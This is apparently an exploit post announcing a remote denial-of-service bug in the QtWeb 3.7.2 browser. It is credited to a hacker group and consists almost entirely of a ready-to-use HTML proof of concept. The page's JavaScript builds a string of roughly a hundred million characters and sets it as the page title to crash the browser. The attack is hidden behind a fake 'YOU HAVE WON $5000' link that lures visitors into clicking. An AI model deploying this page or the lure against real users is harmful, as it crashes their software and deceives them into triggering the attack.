**Legion Of Xtremers & Hackers Garage** **QtWeb Browser Remote Denial of Service** Product Description: QtWeb Browser Version: 3.7.2 (latest) Tested on: Windows Xp SP2/ Windows 7 ultimate Author: Prashant a.k.a t3rm!n4t0r (happyterminator@gmail.com) Special Greetz to: Secfence team and "vinnu" Greetz to: b0nd, AnArki, fb1h2s, RD(Xer0), D4RK357, all Hacker's Garage Crew <------------------bug.html-------------------------> <html> <head> <title>Browser Remote Denial of Service </title> <body bgcolor="teal"> <script type="text/javascript"> function loxians() { var buffer = ""; for (var i = 0; i < 10000; i++) { buffer += "A"; } var buffer2 = buffer; for (i = 0; i < 10000; i++) { buffer2 += buffer; } document.title = buffer2; } </script> </head> <body> <center> <br><h2><a href="javascript:loxians();">CLICK HERE YOU HAVE WON $5000 !!</a></font></h2> </body> </html> <-----------------------bug.html ends------------------->